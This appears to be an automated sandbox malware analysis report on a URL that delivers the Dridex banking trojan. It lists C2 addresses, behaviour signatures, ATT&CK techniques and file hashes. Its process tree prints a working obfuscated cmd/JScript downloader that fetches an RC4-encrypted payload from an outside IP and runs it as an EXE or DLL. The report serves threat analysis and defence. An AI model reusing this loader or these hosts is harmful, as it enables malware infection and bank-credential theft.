Overview

overview

10

Static

static

URLScan

urlscan

https://ankltraffice...

windows7_x64

6

https://ankltraffice...

windows7_x64

6

https://ankltraffice...

windows10_x64

10

https://ankltraffice...

windows10_x64

10

Analysis

  • max time kernel
    123s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    07-10-2021 13:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    211007-qynqkscfgp

Score
10/10
dridex10111botnetdiscoveryevasiontrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

184.168.147.173:6225

212.112.86.37:9676

72.52.96.202:8194
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2428 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1312
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?NDQzODU5&afXe&cxssdvxcv=99tstreet.95dk98.406q5j2w3&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZ39JHT109zUSkrx6B2aClzh8qIpLrtRaFbg2UXUeAdon9wJUF4Ro_uth0jVnBeViJDU_hGNaVhH_6KQEbMLhR32zIE&sdfsdfdfg=diet&fhfghddfsdf=cars&ogfgafgn4=wn_QMvXcLhXQFYPDJf7cT&VdzzNngefMTk1NDE=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://188.227.84.6/?NDQzODU5&afXe&cxssdvxcv=99tstreet.95dk98.406q5j2w3&dsfdffg43t=6dDKUfYH1iJz5Ga3fqSCZ39JHT109zUSkrx6B2aClzh8qIpLrtRaFbg2UXUeAdon9wJUF4Ro_uth0jVnBeViJDU_hGNaVhH_6KQEbMLhR32zIE&sdfsdfdfg=diet&fhfghddfsdf=cars&ogfgafgn4=wn_QMvXcLhXQFYPDJf7cT&VdzzNngefMTk1NDE=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:1184
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c x9h1p.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Users\Admin\AppData\Local\Temp\x9h1p.exe
              x9h1p.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:2128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
    MD5

    ab5c36d10261c173c5896f3478cdc6b7

    SHA1

    87ac53810ad125663519e944bc87ded3979cbee4

    SHA256

    f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9

    SHA512

    e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
    MD5

    9550927d3cdd8759b42e4a455262abe8

    SHA1

    02a79355cfe1220ac370b3cf70beecbf3213a792

    SHA256

    755e1ce80240c08b187afc0c31e00ad764eb2e6bd65ac1a6b9f43c3c58357fb1

    SHA512

    d8292f6b6efd7b88af65b5aeff8c145cc1f0e14171bfe8c36c19fdaa2e2d9f8430e9f6f54e083815429a4bc59a48b190a8e3868e9cabfa4689f12bbc84ce593a

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\B87R0PE2.cookie
    MD5

    dcc6cda2e48602bb6874ea30acbb151c

    SHA1

    6d6db5811b85036e3c0f3a860d6699931808c718

    SHA256

    87622a1d6eb3ba97b58e392c6a37f4bcb46f611c9f2bc6df359dbbd820832b19

    SHA512

    9b46336c7efa87062885afed0002c26bc4fe6de856f473edc410931e9f987fb440e21e4c63b4ac32ee5c27c7104629635e4d94b51ce5b283327ab3614f0895f8

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\QCE12I6O.cookie
    MD5

    d597ffd0be5b02ec5a476104f1550656

    SHA1

    6a2d9e6462e3c060b7dda5c79c1cba9422796989

    SHA256

    2ac85fc2f4562e14ef7a342c2b830b060b78f1052991b2b222cf1b16f83285fa

    SHA512

    20834961a5957068046a5bd6fb051e7b8f5566a789fdf6f22d3168bb61fc3c80ddffb4462695aa1db1ac0e1fd66545cf606c4b9a761be32970a5e9b8ec85ed51

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\x9h1p.exe
    MD5

    180e683c3799142585055ee224b7c25c

    SHA1

    c8f21d45604849300c696d4964cb53472b37ef85

    SHA256

    fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6

    SHA512

    c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\x9h1p.exe
    MD5

    180e683c3799142585055ee224b7c25c

    SHA1

    c8f21d45604849300c696d4964cb53472b37ef85

    SHA256

    fcc960a3ef036d543343647c38c9b90fac965ce6158e7d1f246ba457972f65c6

    SHA512

    c07cc11db3f8fcf39773e548e852694871a6479a66c45230322708e1177532647fa9db58b9edd06278192f7877ffd3aac7ce5a462f6019df850d324a60c583d2

    Download Submit
  • memory/1184-170-0x0000000000000000-mapping.dmp
    Download
  • memory/1312-140-0x0000000000000000-mapping.dmp
    Download
  • memory/1680-176-0x0000000000000000-mapping.dmp
    Download
  • memory/2084-169-0x0000000000000000-mapping.dmp
    Download
  • memory/2128-180-0x0000000000470000-0x00000000005BA000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/2128-177-0x0000000000000000-mapping.dmp
    Download
  • memory/2128-181-0x0000000000400000-0x0000000000462000-memory.dmp
    Filesize

    392KB

    Download
  • memory/2428-132-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-166-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-134-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-136-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-137-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-138-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-115-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-141-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-142-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-144-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-145-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-147-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-149-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-150-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-151-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-155-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-156-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-157-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-163-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-164-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-167-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-133-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-165-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-168-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-131-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-129-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-128-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-172-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-127-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-125-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-124-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-123-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-121-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-122-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-120-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-119-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-184-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-185-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-188-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-189-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-190-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-117-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download
  • memory/2428-116-0x00007FF9AC260000-0x00007FF9AC2CB000-memory.dmp
    Filesize

    428KB

    Download